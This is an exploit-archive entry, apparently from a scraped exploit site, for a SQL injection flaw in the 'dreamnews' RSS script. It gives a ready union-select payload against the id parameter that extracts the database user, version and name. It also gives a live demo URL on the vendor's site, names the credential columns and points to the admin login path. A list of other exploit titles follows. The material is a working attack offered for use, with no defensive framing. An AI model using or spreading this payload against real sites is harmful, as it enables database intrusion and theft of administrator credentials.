########################################################### dreamnews ( rss) Remote SQL Injection Vulnerability#========================================================# Author: Hussin X =# =# Home : www.tryag.cc/cc =# =# email: darkangel_g85[at]Yahoo[DoT]com =# =#========================================================= ## script : http://dreamlevels.com/dreamnews.php## DorK : N/A# ##########################################################Exploit: www.[target].com/Script/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36–L!VE DEMO:http://dreamlevels.com/demo/dreamnews/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36–column_name :user_passworduser_loginAdmin Login :/admin/########################( Greetz )############################ ## tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke ## # # Iraqihack / FAHD / mos_chori / Silic0n ## ############################################################## Im IRAQi


常见问题
相关文章
猜你喜欢
- BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py) 2022-12-07
- IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit 2022-12-07
- Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit 2022-12-07
- MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit 2022-12-07
- MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit 2022-12-07
- MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit 2022-12-07
- Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC 2022-12-07
- IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit 2022-12-07
- IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit 2022-12-07
- Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit 2022-12-07